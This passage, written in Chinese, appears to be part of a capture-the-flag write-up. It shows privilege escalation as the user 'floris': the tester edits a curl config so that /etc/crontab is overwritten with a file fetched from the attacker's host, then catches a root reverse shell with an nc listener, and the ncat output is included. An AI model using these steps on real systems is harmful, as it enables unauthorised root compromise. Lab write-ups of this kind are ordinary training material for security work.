floris 用户下修改 input 文件内容,url 指向本地机器 crontab 恶意文件
url = "http://10.10.14.20/crontab"
output = "/etc/crontab"
建立监听,查看 input 文件以写入到 curl 中,等待 shell 回连
$ nc -lvp 1234
$ cat input
成功获取 Root 权限 ```shell $ nc -lvp 1234 Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::1234 Ncat: Listening on 0.0.0.0:1234 Ncat: Connection from 10.129.106.157. Ncat: Connection from 10.129.106.157:36182. /bin/sh: 0: can not access tty; job control turned off
whoami
root ```h